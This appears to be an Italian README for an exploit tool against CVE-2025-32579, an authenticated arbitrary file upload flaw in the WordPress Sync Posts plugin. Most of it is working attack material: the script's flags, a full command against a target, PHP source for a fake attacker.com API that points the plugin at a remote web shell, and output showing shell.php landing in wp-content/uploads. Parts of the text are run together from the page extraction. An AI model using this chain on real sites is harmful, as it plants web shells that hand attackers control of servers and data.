
Il plugin WordPress Sync Posts Plugin <= 1.0 è vulnerabile al Caricamento Arbitrario di File.
📦 Interessa: Sync Posts <= 1.0
🧨 Punteggio CVSS: 9.9 CRITICA
📁 Vettore CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Il plugin WordPress Sync Posts di SoftClever Limited è vulnerabile a una vulnerabilità di Upload di File Non Restretto che permette a attaccanti autenticati di caricare ed eseguire file PHP arbitrari (come web shell) sul server.
website_url che restituisce post JSON.wp-content/uploads.Lo script di exploit automatizza l'intera catena:
<img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">website_url malevolo a admin-ajax.php?action=sync_posts/uploads/usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL
Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://target.com/wordpress)
-un, --username USERNAME
Username to login
-p, --password PASSWORD
Password to login
-ws, --website WEBSITE
URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
-shell, --webshell WEBSHELL
Web shell URL used inside the fake API (can be a test image)
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
Puoi anche usare un'immagine fittizia al posto di una shell reale per test:
--webshell https://via.placeholder.com/1x1.jpg
Questa è la risposta restituita da Khaled_alenazi.php:
<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src="http://attacker.com/shell.php">"
]
]
]);
?>
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
"success": true,
"data": {
"message": "Posts imported successfully",
...
}
}
shell.phpwp-content/uploads/2025/04/shell.phpwebsite_url a domini interni o host autorizzatiCVE: CVE-2025-32579
Exploit di Nxploited (Khaled Alenazi)
| Flag | Descrizione |
|---|
-u, --url | URL del WordPress target |
-un, --username | Nome utente WordPress (admin) |
-p, --password | Password WordPress |
-ws, --website | URL del file PHP malevolo che restituisce JSON falso del post |
-shell, --webshell | Il file shell effettivo da iniettare tramite `` |